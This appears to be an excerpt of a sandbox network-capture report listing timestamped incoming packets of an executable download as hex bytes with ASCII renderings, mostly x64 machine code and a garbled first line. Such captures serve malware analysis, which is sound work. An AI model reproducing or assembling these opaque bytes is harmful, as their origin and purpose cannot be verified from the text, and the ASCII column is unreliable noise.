]@A/L3AL3AA@L3AL3IHIHA/A
2023-11-18 09:02:42 UTC	9039	IN	Data Raw: 8b 6c 24 30 48 8b 7c 24 70 4c 8b 7c 24 20 48 83 c4 40 5e 5d 5b c3 8b 44 24 60 eb de 33 c0 48 83 c4 40 5e 5d 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 40 53 48 83 ec 30 48 8b c2 48 8d 0d 50 36 00 00 49 8b d9 48 8d 15 96 36 00 00 4d 8b c8 48 89 5c 24 20 83 78 7c 12 44 8b 40 78 48 0f 44 d1 48 8b c8 e8 2a 00 00 00 85 c0 75 1a 48 8b cb e8 9e 17 0c 00 83 f8 64 74 0d 48 8b cb 48 83 c4 30 5b e9 ac 29 0c 00 48 83 c4 30 5b c3 cc cc cc cc cc cc 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 41 54 41 55 41 56 41 57 48 83 ec 40 4c 8b a4 24 90 00 00 00 45 33 ed 41 8b c5 41 8b dd 49 8b f1 41 8b e8 4c 8b f2 4c 8b f9 49 8b f9 0f 1f 40 00 3b dd 0f 8d 9d 00 00 00 48 85 f6 74 09 44 38 2f 0f 84 82 00 00 00 4c 8d 44 24 30 4c 89 6c 24 30 8b d3 49 8b cf 41 ff d6 4c Data Ascii: l$0H\|$pL\|$ H@^][D$`3H@^][@SH0HHP6IH6MH\$ x\|D@xHDH*uHdtHH0[)H0[H\$Hl$Ht$WATAUAVAWH@L$E3AAIALLI@;HtD8/LD$0Ll$0IAL
2023-11-18 09:02:42 UTC	9046	IN	Data Raw: 5d d7 48 8b 4e 38 4d 8b f7 49 c1 e6 02 33 d2 4d 8b c6 4c 89 75 cf e8 8b a3 fa ff 41 8b 44 24 78 45 33 c9 41 bd 0b 00 00 00 85 c0 0f 8e 17 0f 00 00 41 ba 01 00 00 00 44 89 55 c7 66 66 66 0f 1f 84 00 00 00 00 00 41 03 c1 48 63 c8 49 8b 84 24 90 00 00 00 48 83 3c c8 00 74 2e 41 8b c9 41 8b c1 83 e1 1f 45 85 c9 79 07 41 8d 41 1f 83 e9 20 c1 f8 05 48 63 d0 48 8b 46 38 4c 8d 04 90 41 8b c2 d3 e0 41 09 00 45 33 ed 41 8b 44 24 78 41 ff c1 44 3b c8 7c b0 45 85 ed 0f 85 a9 0e 00 00 85 db 74 27 8b c7 99 83 e2 1f 03 c2 8b c8 83 e0 1f 2b c2 c1 f9 05 48 63 d1 48 8b 4e 38 4c 8d 04 91 8b c8 41 8b c2 d3 e0 41 09 00 48 83 7e 40 00 48 8d 46 40 48 89 45 ef 0f 84 97 00 00 00 48 8b 10 4d 8b c6 48 8b 76 38 48 8b d8 48 8b ce 41 8b fa 48 8b 52 08 e8 dd 05 fc ff 85 c0 74 30 66 0f Data Ascii: ]HN8MI3MLuAD$xE3AADUfffAHcI$H<t.AAEyAA HcHF8LAAE3AD$xAD;\|Et'+HcHN8LAAH~@HF@HEHMHv8HHAHRt0f
2023-11-18 09:02:42 UTC	9057	IN	Data Raw: 33 d2 41 b8 98 00 00 00 48 8b c8 e8 56 76 fa ff 48 89 6b 10 41 8b c7 44 89 73 18 4c 89 7b 30 4c 89 7b 38 c7 43 40 01 00 00 00 89 7b 5c 44 89 7b 60 48 89 1e eb 05 b8 07 00 00 00 48 8b 5c 24 40 48 8b 6c 24 48 48 8b 74 24 50 48 83 c4 20 41 5f 41 5e 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 48 89 7c 24 20 41 56 48 83 ec 20 45 33 f6 49 8b f0 4c 89 31 8b ea 48 8b f9 e8 d3 7e 03 00 85 c0 75 44 b9 98 00 00 00 e8 b5 1f 0f 00 48 8b d8 48 85 c0 74 32 33 d2 41 b8 98 00 00 00 48 8b c8 e8 ad 75 fa ff 48 89 73 10 41 8b c6 89 6b 18 4c 89 73 30 4c 89 73 38 c7 43 40 01 00 00 00 4c 89 73 5c 48 89 1f eb 05 b8 07 00 00 00 48 8b 5c 24 30 48 8b 6c 24 38 48 8b 74 24 40 48 8b 7c 24 48 48 83 c4 20 41 5e c3 cc cc cc cc Data Ascii: 3AHVvHkADsL{0L{8C@{\D{`HH\$@Hl$HHt$PH A_A^_H\$Hl$Ht$H\|$ AVH E3IL1H~uDHHt23AHuHsAkLs0Ls8C@Ls\HH\$0Hl$8Ht$@H\|$HH A^
2023-11-18 09:02:42 UTC	9070	IN	Data Raw: 48 89 4e 60 e8 15 44 03 00 4c 8b bc 24 98 00 00 00 4c 8b ac 24 a8 00 00 00 48 8b bc 24 b8 00 00 00 48 8b b4 24 c0 00 00 00 48 8b 9c 24 c8 00 00 00 48 85 c0 74 09 48 8b c8 ff 15 8f 79 13 00 8b c5 48 81 c4 d0 00 00 00 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 10 48 89 6c 24 18 48 89 74 24 20 57 48 83 ec 40 48 8b 42 20 48 8b da 48 89 44 24 28 49 8b e9 48 8b 42 18 48 8b f9 4c 8b 4a 08 49 8b f0 48 8b 51 08 8b 4b 10 48 89 44 24 20 e8 2e 02 00 00 48 85 c0 74 2e 4c 8b 43 08 48 8d 0d 5e ae 10 00 48 8b 57 08 4c 8b ce 48 89 44 24 30 48 89 6c 24 28 4c 89 44 24 20 e8 63 bb 0e 00 48 8b e8 48 85 c0 75 0a b8 07 00 00 00 e9 86 00 00 00 33 c9 48 8d 44 24 50 48 89 4c 24 30 45 33 c9 48 89 44 24 28 41 83 c8 ff 48 89 4c 24 20 48 8b d5 48 8b Data Ascii: HN`DL$L$H$H$H$HtHyH]H\$Hl$Ht$ WH@HB HHD$(IHBHLJIHQKHD$ .Ht.LCH^HWLHD$0Hl$(LD$ cHHu3HD$PHL$0E3HD$(AHL$ HH
2023-11-18 09:02:42 UTC	9086	IN	Data Raw: 5a 01 00 00 41 8b 45 20 89 43 14 eb 06 41 b8 02 02 00 00 40 f6 c5 02 74 3b 8b c7 49 8b 0c c6 48 85 c9 74 2e 0f b7 51 08 0f b7 c2 66 41 23 c0 66 41 3b c0 75 0c 44 38 79 0a 75 06 48 8b 71 10 eb 11 41 84 d7 75 0c 41 0f b6 d7 e8 bf fa 0b 00 48 8b f0 ff c7 40 f6 c5 04 74 3f 8b c7 49 8b 0c c6 0f b7 41 08 a8 08 74 06 f2 0f 10 01 eb 17 a8 24 74 0a 0f 57 c0 f2 48 0f 2a 01 eb 09 a8 12 74 10 e8 09 08 0c 00 0f 57 c9 66 0f 2e c1 7a 05 75 03 45 33 ff 44 88 7b 11 eb 04 c6 43 11 00 49 8b 4d 18 e8 08 7e 0e 00 49 8b 4d 18 48 8b f8 48 63 53 14 48 c1 e2 05 4c 8b 41 20 48 8b c8 4e 8b 04 02 48 8d 15 67 6b 10 00 e8 72 79 0e 00 48 85 f6 74 12 4c 8b c6 48 8d 15 f3 6b 10 00 48 8b cf e8 5b 79 0e 00 40 f6 c5 08 74 0f 48 8d 15 ee 6b 10 00 48 8b cf e8 46 79 0e 00 48 8b cf e8 9e 7f 0e Data Ascii: ZAE CA@t;IHt.QfA#fA;uD8yuHqAuAH@t?IAt$tWH*tWf.zuE3D{CIM~IMHHcSHLA HNHgkryHtLHkH[y@tHkHFyH
2023-11-18 09:02:42 UTC	9091	IN	Data Raw: 8b 57 18 48 8d 0d bc fe 0f 00 e8 47 67 0e 00 48 8b c8 48 8b 44 24 68 48 89 08 b8 01 00 00 00 e9 ab 00 00 00 8b f3 ba 03 00 00 00 48 8b cd e8 c3 d5 04 00 48 8d 15 7c b4 10 00 48 8b cd e8 b4 e1 04 00 8b f8 85 c0 75 7d e8 59 f7 02 00 85 c0 75 55 39 1d 0f 24 13 00 74 3a 48 8b 0d c6 59 13 00 48 85 c9 74 06 ff 15 7b 24 13 00 48 8d 54 24 20 b9 28 00 00 00 e8 8c 98 0e 00 48 8b 0d a5 59 13 00 48 85 c9 74 06 ff 15 6a 24 13 00 48 8b 5c 24 20 eb 0e b9 28 00 00 00 ff 15 e8 23 13 00 48 8b d8 48 85 db 75 07 bf 07 00 00 00 eb 18 33 c0 48 89 03 48 89 43 08 48 89 43 10 48 89 43 20 48 89 6b 18 89 73 20 48 8b 44 24 60 48 89 18 8b c7 48 8b 5c 24 40 48 8b 6c 24 48 48 8b 74 24 50 48 83 c4 30 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 4c 8b dc 49 89 5b 10 57 48 Data Ascii: WHGgHHD$hHHH\|Hu}YuU9$t:HYHt{$HT$ (HYHtj$H\$ (#HHu3HHCHCHC Hks HD$`HH\$@Hl$HHt$PH0_LI[WH
2023-11-18 09:02:42 UTC	9097	IN	Data Raw: e8 11 ef 02 00 4c 8d 4f 01 44 8b c0 48 8d 15 63 3c 10 00 eb 68 b8 01 00 00 00 4c 8d 4f 01 44 8b c0 48 8d 15 4e 3c 10 00 eb 53 80 7b 29 00 77 63 fe 43 25 48 8d 0d 9c ae f9 ff 0f b6 07 c7 44 24 30 00 00 00 00 44 0f b6 84 08 a0 69 17 00 41 83 f8 1e 77 0f 48 8d 54 24 30 48 8b cf e8 b5 ee 02 00 eb 05 b8 01 00 00 00 44 8b c0 4c 8b cf 48 8d 05 61 ae f9 ff 4a 8b 94 e8 00 e4 16 00 49 8b ce e8 41 4e 0e 00 ff c5 48 ff c6 49 3b f4 0f 8c 36 ff ff ff 4c 8b 6c 24 48 8b 7c 24 34 48 8d 15 f7 3b 10 00 49 8b ce e8 1b 4e 0e 00 49 8b ce e8 73 54 0e 00 48 8b f0 48 85 c0 75 2d 8d 78 07 4c 8b 74 24 38 48 8b ce e8 5b 7f 0e 00 85 ff 0f 85 9e 00 00 00 0f b6 4b 25 0f b6 c1 d0 e8 88 43 24 3c 01 73 5d 8d 47 02 eb 6e 3b ef 7d 22 48 8d 15 43 3b 10 00 48 8d 0d d4 c1 0f 00 e8 b7 4f 0e 00 Data Ascii: LODHc<hLODHN<S{)wcC%HD$0DiAwHT$0HDLHaJIANHI;6Ll$H\|$4H;INIsTHHu-xLt$8H[K%C$<s]Gn;}"HC;HO
2023-11-18 09:02:42 UTC	9103	IN	Data Raw: 4b 2c 8b 53 2c 8b c2 49 8b 4e 18 c1 f8 08 88 01 88 51 01 41 c7 46 14 01 00 00 00 48 8b 7b 60 48 85 ff 0f 84 99 00 00 00 85 f6 75 0d 48 8b d7 48 8b cb e8 6f 01 00 00 8b f0 48 8b 47 20 ff 4b 54 48 89 43 60 83 3d db f6 12 00 00 74 5e 48 8b 0d 92 2c 13 00 48 85 c9 74 06 ff 15 47 f7 12 00 48 8b cf ff 15 f6 f6 12 00 48 ff 0d 3f 2d 13 00 48 8b cf 48 63 d0 48 29 15 ea 2c 13 00 ff 15 cc f6 12 00 48 8b 0d 5d 2c 13 00 48 85 c9 74 26 ff 15 22 f7 12 00 eb 1e 45 33 c9 48 8b d7 48 8b cb e8 22 0b 00 00 8b f0 e9 8e fe ff ff 48 8b cf ff 15 9a f6 12 00 48 8b 7b 60 48 85 ff 0f 85 67 ff ff ff 49 8b d6 48 8b cb 85 f6 75 07 e8 e6 4e 00 00 eb 07 e8 df 4e 00 00 8b c6 48 8b 5c 24 48 48 8b 6c 24 50 48 83 c4 20 41 5e 5f 5e c3 cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 74 24 Data Ascii: K,S,INQAFH{`HuHHoHG KTHC`=t^H,HtGHH?-HHcH),H],Ht&"E3HH"HH{`HgIHuNNH\$HHl$PH A^_^H\$Ht$
2023-11-18 09:02:42 UTC	9107	IN	Data Raw: 57 01 e8 e7 f8 0a 00 48 8b 8e a0 00 00 00 e8 4b 0a 0b 00 83 f8 64 75 37 48 8b 8e a0 00 00 00 33 d2 e8 d8 01 0b 00 48 8b d0 48 8b c5 48 85 ed 74 0e 48 39 50 08 74 18 48 8b 00 48 85 c0 75 f2 4c 8b cb 45 33 c0 48 8b ce e8 f1 41 00 00 8b f8 48 8b 8e a0 00 00 00 e8 23 1c 0b 00 85 c0 75 0e 8b c7 85 ff 75 08 48 83 3b 00 41 0f 44 c6 48 8b 1b 85 c0 0f 84 66 ff ff ff 48 8b 7c 24 30 48 8b 5c 24 38 48 8b 6c 24 40 48 8b 74 24 48 48 83 c4 20 41 5e c3 cc cc cc cc cc cc cc cc cc cc cc 40 53 55 56 57 41 54 41 55 41 56 41 57 48 81 ec c8 00 00 00 48 8b 05 85 c6 12 00 48 33 c4 48 89 84 24 b8 00 00 00 48 8b 42 18 4c 8d 7a 18 44 89 4c 24 44 4d 8b e0 4c 89 44 24 48 48 8b f2 48 8b f9 c7 44 24 40 00 00 00 00 44 0f b6 70 02 0f b6 40 03 41 c1 e6 08 44 03 f0 45 8d 6e 01 41 8b dd 48 Data Ascii: WHKdu7H3HHHtH9PtHHuLE3HAH#uuH;ADHfH\|$0H\$8Hl$@Ht$HH A^@SUVWATAUAVAWHHH3H$HBLzDL$DMLD$HHHD$@Dp@ADEnAH
2023-11-18 09:02:42 UTC	9123	IN	Data Raw: 0a 00 48 8b cb 89 77 14 e8 71 dc 0a 00 ba 02 00 00 00 48 8b cb 8b f0 e8 82 bb 0a 00 85 c0 75 12 48 8b 0b 48 8b 49 18 48 85 c9 74 06 ff 15 8c a6 12 00 48 83 7f 08 00 48 8b 5c 24 40 75 49 85 f6 75 45 48 8b 4d 18 e8 73 6b 02 00 8b c8 48 89 47 08 b8 af 7e d0 51 f7 e1 8b c1 2b c2 d1 e8 03 c2 c1 e8 06 6b c0 61 2b c8 48 63 c1 48 8d 0c c5 00 00 00 00 48 8b 84 29 c0 00 00 00 48 89 47 20 48 89 bc 29 c0 00 00 00 48 8b 6c 24 48 8b c6 48 8b 74 24 50 48 83 c4 30 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 44 0f b6 49 27 48 8b fa 8b 41 20 4c 8b d1 83 e8 04 99 41 f7 f9 4c 8b 4f 18 8b f0 41 0f b6 59 02 41 0f b6 49 03 c1 e3 08 03 d9 3b d8 7d 27 44 8b cb 48 8b d7 49 8b ca e8 c5 00 00 00 48 8b 4f 18 8d 53 Data Ascii: HwqHuHHIHtHH\$@uIuEHMskHG~Q+ka+HcHH)HG H)Hl$HHt$PH0_H\$Ht$WH DI'HA LALOAYAI;}'DHIHOS
2023-11-18 09:02:42 UTC	9131	IN	Data Raw: 8b 54 24 68 45 33 c9 4c 89 4b 30 48 8d 05 ac 2a 0f 00 48 89 43 10 b8 02 08 00 00 66 89 43 08 44 89 4b 0c c6 43 0a 01 85 ff 0f 89 76 03 00 00 48 8b 43 28 48 85 c0 74 16 48 8b 80 60 01 00 00 48 85 c0 74 0a ff 40 30 c7 40 18 12 00 00 00 48 8b ca e8 20 af 0a 00 e9 4a 03 00 00 48 89 b4 24 58 01 00 00 b9 c0 ff ff ff 39 8d c0 00 00 00 b8 40 00 00 00 4c 89 a4 24 50 01 00 00 be 01 00 00 00 0f 4d 8d c0 00 00 00 3b c8 4c 89 b4 24 48 01 00 00 44 8b b5 b8 00 00 00 0f 4f c8 89 4c 24 5c 89 74 24 54 4d 8b e1 4c 89 4c 24 78 85 c9 78 0c 8d 41 ff 03 c6 99 f7 fe 8b c8 eb 02 f7 d9 48 63 d6 49 8b c1 48 89 44 24 70 48 89 55 a8 89 4c 24 50 85 f6 0f 8e f7 00 00 00 48 8d 7d d0 66 66 0f 1f 84 00 00 00 00 00 45 33 c0 83 ce ff 41 8b d9 4c 89 07 4c 89 47 08 4c 89 47 10 45 39 47 30 0f Data Ascii: T$hE3LK0H*HCfCDKCvHC(HtH`Ht@0@H JH$X9@L$PM;L$HDOL$\t$TMLL$xxAHcIHD$pHUL$PH}ffE3ALLGLGE9G0
2023-11-18 09:02:42 UTC	9141	IN	Data Raw: 0f b6 4a 02 41 8b c0 c1 e1 0e 25 ff 3f 00 00 44 8b c1 44 0b c0 41 0f ba e0 15 72 16 b8 03 00 00 00 49 03 c2 49 89 03 41 8d 40 fe 48 63 c8 48 01 0a c3 41 0f b6 4a 03 41 8b c0 c1 e1 15 25 ff ff 1f 00 44 8b c1 44 0b c0 41 0f ba e0 1c 72 16 b8 04 00 00 00 49 03 c2 49 89 03 41 8d 40 fe 48 63 c8 48 01 0a c3 41 0f b6 4a 04 41 8b c0 25 ff ff ff 0f 83 e1 07 c1 e1 1c 44 8b c1 44 0b c0 b8 05 00 00 00 49 03 c2 49 89 03 41 8d 40 fe 48 63 c8 48 01 0a c3 44 0f b6 c0 b8 01 00 00 00 49 03 c2 49 89 03 41 8d 40 fe 48 63 c8 48 01 0a c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 85 c9 74 13 80 79 01 00 c6 01 00 75 0a 80 79 02 00 0f 84 f8 cf 0d 00 c3 cc cc cc cc cc cc cc 48 63 41 04 48 8d 51 1c 4c 8b c0 c7 41 08 01 00 00 00 83 c0 02 49 c1 e0 02 4c 63 c8 4a 8d 0c 89 48 Data Ascii: JA%?DDArIIA@HcHAJA%DDArIIA@HcHAJA%DDIIA@HcHDIIA@HcHHtyuyHcAHQLAILcJH
2023-11-18 09:02:42 UTC	9149	IN	Data Raw: 02 00 00 01 00 00 00 85 db 0f 85 87 02 00 00 45 33 c9 48 c7 45 c8 00 00 00 00 4c 8d 45 c8 49 8b ce 8d 53 08 e8 45 89 00 00 8b d8 85 c0 75 34 48 8b 5d c8 4c 8d 47 01 48 8b cb 8d 50 01 e8 fc 4e 0a 00 48 8b cb e8 64 60 0a 00 33 d2 48 8b cb e8 9a 58 0a 00 48 8b cb 44 8b e0 e8 6f 72 0a 00 8b d8 eb 04 44 8b 65 b8 45 85 e4 74 14 83 7d 38 00 0f 84 8b 00 00 00 41 83 fc 01 0f 85 81 00 00 00 45 33 c9 4c 8d 45 d0 49 8b ce 48 ff c7 41 8d 51 0f e8 d8 88 00 00 8b d8 85 c0 75 61 48 8b 5d d0 4c 8d 47 01 48 8b cb 8d 50 01 e8 8f 4e 0a 00 48 c1 ef 0a ba 02 00 00 00 48 8b cb 4c 8d 47 01 49 c1 e0 0a e8 76 4e 0a 00 48 8b cb 33 ff e8 dc 5f 0a 00 83 f8 64 75 11 33 d2 48 8b cb e8 1d 55 0a 00 83 f8 05 40 0f 94 c7 48 8b cb e8 de 71 0a 00 8b d8 85 ff 74 07 83 8e c8 02 00 00 02 48 8b Data Ascii: E3HELEISEu4H]LGHPNHd`3HXHDorDeEt}8AE3LEIHAQuaH]LGHPNHHLGIvNH3_du3HU@HqtH
2023-11-18 09:02:42 UTC	9159	IN	Data Raw: 8b 41 10 45 33 f6 44 8b 59 20 48 8b d9 41 8b f6 48 85 c0 74 0c 45 85 db 74 07 48 ff c0 48 89 41 10 4c 63 51 0c 44 8b 49 08 48 89 6c 24 40 48 89 7c 24 48 4c 89 64 24 50 4c 89 7c 24 58 45 3b d1 7c 0b 4c 89 31 41 8b c6 e9 0b 02 00 00 41 b8 02 00 00 00 45 8d 60 ff 45 85 db 0f 84 90 00 00 00 48 8b 01 4a 8d 14 10 42 0f b6 04 10 84 c0 79 74 0f b6 72 01 c1 e6 07 0f b6 c0 83 e0 7f 0b f0 0f ba e6 0e 72 05 41 8b c0 eb 60 0f b6 4a 02 8b c6 c1 e1 0e 25 ff 3f 00 00 8b f1 0b f0 0f ba e6 15 72 07 b8 03 00 00 00 eb 41 0f b6 4a 03 8b c6 c1 e1 15 25 ff ff 1f 00 8b f1 0b f0 0f ba e6 1c 72 07 b8 04 00 00 00 eb 22 0f b6 4a 04 8b c6 83 e1 07 25 ff ff ff 0f c1 e1 1c 8b f1 0b f0 b8 05 00 00 00 eb 06 0f b6 f0 41 8b c4 41 03 c2 89 43 0c 48 8b 03 48 63 53 0c 48 03 d0 0f b6 02 84 c0 Data Ascii: AE3DY HAHtEtHHALcQDIHl$@H\|$HLd$PL\|$XE;\|L1AAE`EHJBytrrA`J%?rAJ%r"J%AACHHcSH
2023-11-18 09:02:42 UTC	9168	IN	Data Raw: 85 ff 48 8b ce 0f 48 f8 48 63 d7 e8 56 62 0d 00 48 85 c0 74 16 48 89 43 18 33 c0 48 8b 5c 24 30 48 8b 74 24 38 48 83 c4 20 5f c3 48 8b 5c 24 30 b8 07 00 00 00 48 8b 74 24 38 48 83 c4 20 5f c3 cc cc cc cc cc cc 45 33 d2 c7 41 28 01 00 00 00 45 8b ca 44 89 51 0c 44 39 51 08 7e 3d 45 8b c2 66 0f 1f 44 00 00 48 8b 01 4d 8d 40 08 41 ff c1 49 8b 54 00 f8 4c 89 52 70 48 8b 01 49 8b 54 00 f8 44 89 52 78 48 8b 01 49 8b 54 00 f8 4c 89 92 80 00 00 00 44 3b 49 08 7c cc 33 c0 c3 cc cc cc cc cc cc cc cc cc 4c 89 4c 24 20 44 89 44 24 18 48 89 4c 24 08 56 57 41 54 41 55 41 57 48 83 ec 50 4c 63 bc 24 a0 00 00 00 4c 8d 2d 26 1d 00 00 48 63 7a 08 48 8b f1 48 8d 0d b8 1c 00 00 4d 8b c1 45 8b cf 4c 8b e2 80 be cf 01 00 00 00 4c 0f 45 e9 48 8b ce 4c 89 6c 24 28 e8 67 01 00 00 Data Ascii: HHHcVbHtHC3H\$0Ht$8H _H\$0Ht$8H _E3A(EDQD9Q~=EfDHM@AITLRpHITDRxHITLD;I\|3LL$ DD$HL$VWATAUAWHPLc$L-&HczHHMELLEHLl$(g
2023-11-18 09:02:42 UTC	9173	IN	Data Raw: 00 00 41 03 f0 41 03 f2 8b 81 c8 01 00 00 3b f0 7e 45 48 39 7b 20 0f 85 3f 01 00 00 3b f0 7e 37 e8 71 af 01 00 85 c0 75 0f 85 f6 7e 0b 48 63 ce e8 51 50 0d 00 48 8b f8 48 89 7b 40 48 85 ff 0f 84 61 02 00 00 4c 8b 9c 24 a8 00 00 00 44 8b 54 24 30 4c 8b 4c 24 48 48 83 7b 20 00 74 35 4d 63 c2 49 8b d1 4c 03 43 40 49 8b c8 66 66 66 0f 1f 84 00 00 00 00 00 0f b6 c2 48 c1 ea 07 0c 80 88 01 48 ff c1 48 85 d2 75 ed 80 61 ff 7f 41 2b c8 44 03 d1 4c 8b 44 24 50 4d 63 ca 49 8b c8 4c 03 4b 40 49 8b d1 90 0f b6 c1 48 c1 e9 07 0c 80 88 02 48 ff c2 48 85 c9 75 ed 80 62 ff 7f 41 2b d1 44 03 d2 48 8b 54 24 48 49 63 ca 49 03 d3 48 03 4b 40 44 89 54 24 30 e8 7a 9d f8 ff 8b 44 24 38 03 44 24 30 ff 43 18 83 bc 24 a0 00 00 00 00 89 43 38 74 4d 39 6b 2c 7d 22 48 8b 4b 30 8d 3c Data Ascii: AA;~EH9{ ?;~7qu~HcQPHH{@HaL$DT$0LL$HH{ t5McILC@IfffHHHuaA+DLD$PMcILK@IHHHubA+DHT$HIcIHK@DT$0zD$8D$0C$C8tM9k,}"HK0<
2023-11-18 09:02:42 UTC	9179	IN	Data Raw: 85 c9 74 07 e8 5d 39 09 00 eb 5d 48 83 bb d8 01 00 00 00 75 26 48 8b 53 28 48 8d 0d a6 ec 0e 00 e8 81 08 0d 00 48 89 83 d8 01 00 00 48 85 c0 75 0a b8 07 00 00 00 e9 08 01 00 00 4c 8b 83 d8 01 00 00 4c 8d 0d 89 ec 0e 00 48 8b 53 20 48 8b 4b 18 4c 89 74 24 30 c7 44 24 28 00 00 00 00 48 89 7c 24 20 e8 2e 3d 09 00 48 89 74 24 60 8b d8 85 c0 0f 85 ba 00 00 00 49 8b 06 48 85 c0 74 0b 48 83 78 18 00 74 04 8b 30 eb 02 33 f6 89 75 00 4d 85 ff 0f 84 a4 00 00 00 8d 5e 14 e8 56 98 01 00 85 c0 74 0d 33 ff 49 89 3f 8d 5f 07 e9 8b 00 00 00 85 db 7e 0d 48 63 cb e8 29 39 0d 00 48 8b f8 eb 02 33 ff 48 85 ff 75 08 8d 5f 07 49 89 3f eb 6b 48 8b 84 24 80 00 00 00 48 85 c0 74 0f 81 fe 00 40 00 00 7e 07 be 00 10 00 00 89 30 49 8b 0e 48 8d 05 ef 3b 0b 00 45 33 c9 48 89 44 24 20 Data Ascii: t]9]Hu&HS(HHHuLLHS HKLt$0D$(H\|$ .=Ht$`IHtHxt03uM^Vt3I?_~Hc)9H3Hu_I?kH$Ht@~0IH;E3HD$
2023-11-18 09:02:42 UTC	9190	IN	Data Raw: 80 3c 01 00 74 0b 8d 42 01 89 43 14 41 3b c2 7c d7 8b 43 14 3b c6 7f 16 41 3b c2 7c 99 b8 65 00 00 00 48 83 c4 20 41 5d 41 5c 5f 5e 5b c3 48 89 6c 24 50 8b e8 2b ee 4c 89 74 24 60 4c 89 7c 24 68 3b 6b 28 7e 30 4c 8b 7b 20 44 8d 75 14 44 89 73 28 e8 5f 6b 01 00 85 c0 75 71 45 85 f6 49 8b cf 44 0f 48 f0 49 63 d6 e8 79 07 0d 00 48 85 c0 74 5a 48 89 43 20 4c 8b 43 20 48 8d 0c 37 4d 8b cd 8b d5 e8 5e 00 00 00 48 8b 43 20 48 8b 4c 24 58 48 89 01 48 8b 44 24 70 41 89 34 24 8b 4b 14 89 08 48 8b 44 24 78 8b 4b 18 89 08 ff 43 18 33 c0 4c 8b 74 24 60 48 8b 6c 24 50 4c 8b 7c 24 68 48 83 c4 20 41 5d 41 5c 5f 5e 5b c3 b8 07 00 00 00 eb de cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 40 53 57 41 55 48 81 ec 80 00 00 00 48 8b 05 8d 78 11 00 48 33 c4 48 89 44 Data Ascii: <tBCA;\|C;A;\|eH A]A\_^[Hl$P+Lt$`L\|$h;k(~0L{ DuDs(_kuqEIDHIcyHtZHC LC H7M^HC HL$XHHD$pA4$KHD$xKC3Lt$`Hl$PL\|$hH A]A\_^[@SWAUHHxH3HD
2023-11-18 09:02:42 UTC	9196	IN	Data Raw: a1 0f 1f 44 00 00 41 0f b6 01 84 c0 74 2e 0f be c0 83 e8 61 48 63 c8 42 0f be 14 11 83 fa 02 7d 09 b8 01 00 00 00 2b c2 eb 09 49 8d 49 01 e8 53 01 00 00 85 c0 74 05 49 ff c1 eb ca 41 80 39 00 75 0a b8 01 00 00 00 48 83 c4 28 c3 49 8b c9 e8 32 01 00 00 85 c0 74 0f 49 ff c1 49 8b c9 e8 23 01 00 00 85 c0 75 f1 33 c0 41 38 01 0f 94 c0 48 83 c4 28 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 28 4c 8b c9 4c 8d 15 aa fa 0e 00 66 90 41 0f b6 01 84 c0 74 2e 0f be c0 83 e8 61 48 63 c8 42 0f be 14 11 83 fa 02 7d 09 b8 01 00 00 00 2b c2 eb 09 49 8d 49 01 e8 c3 00 00 00 85 c0 74 05 49 ff c1 eb ca 41 80 39 00 75 07 33 c0 48 83 c4 28 c3 41 0f b6 01 84 c0 74 4a 0f be c0 83 e8 61 48 63 c8 42 0f be 04 11 83 f8 02 7c 2e 41 0f b6 41 01 84 c0 74 29 0f be Data Ascii: DAt.aHcB}+IIStIA9uH(I2tII#u3A8H(H(LLfAt.aHcB}+IItIA9u3H(AtJaHcB\|.AAt)
2023-11-18 09:02:42 UTC	9202	IN	Data Raw: 84 24 c0 00 00 00 8b 8c 24 b0 00 00 00 41 2b ce 89 08 45 85 ff 74 21 49 8b cd e8 97 f4 ff ff 49 8b cc e8 8f f4 ff ff 48 8b 84 24 b8 00 00 00 48 c7 00 00 00 00 00 eb 0b 48 8b 84 24 b8 00 00 00 4c 89 28 48 8b 74 24 58 41 8b c7 48 8b 6c 24 60 48 83 c4 68 41 5f 41 5e 41 5d 41 5c 5f 5b c3 cc cc cc cc cc cc cc 48 83 ec 28 48 83 7a 08 00 4c 8b ca 4c 8b d9 74 38 49 8b c8 e8 77 00 00 00 0f 1f 80 00 00 00 00 4d 8b 51 08 41 8b 12 83 fa 01 75 04 8b ca eb 0b 33 c9 83 fa 04 0f 95 c1 83 c1 02 3b c8 7f 0a 49 83 7a 08 00 4d 8b ca 75 d7 49 8b 41 08 48 85 c0 74 19 4c 89 40 18 49 8b 41 08 49 89 40 08 4d 89 48 10 4d 89 41 08 48 83 c4 28 c3 4d 89 48 10 4d 89 41 08 4d 89 03 48 83 c4 28 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 11 83 fa 01 75 03 8b c2 Data Ascii: $$A+Et!IIH$HH$L(Ht$XAHl$`HhA_A^A]A\_[H(HzLLt8IwMQAu3;IzMuIAHtL@IAI@MHMAH(MHMAMH(u
2023-11-18 09:02:42 UTC	9213	IN	Data Raw: 4c 8d 45 ef 48 8d 55 07 48 8d 4d f7 e8 b5 63 00 00 48 8b 7d f7 eb 6d 41 0f b6 14 24 4d 8b c4 84 d2 74 17 0f 1f 00 80 e2 80 49 ff c0 0f b6 ca 41 0f b6 10 0f b6 c2 0a c1 75 ec 45 2b c4 49 8b d4 eb 2e 48 39 75 e7 74 75 0f b6 16 4c 8b c6 84 d2 74 18 0f 1f 40 00 80 e2 80 49 ff c0 0f b6 ca 41 0f b6 10 0f b6 c2 0a c1 75 ec 44 2b c6 48 8b d6 41 ff c0 48 8b cf 49 63 d8 4c 8b c3 e8 75 ff f7 ff 48 03 fb 41 2b 7e 28 41 2b fd 78 1f 41 8b 46 30 3b f8 7f 17 2b c7 48 63 cf 49 03 4e 28 33 d2 4c 63 c0 e8 8e 07 f8 ff 41 89 7e 30 4d 8b 7e 28 41 8b 46 50 4c 89 7d 7f 89 45 6f eb 07 4c 8b 7d 7f 45 33 ed 48 8b 4d ff 48 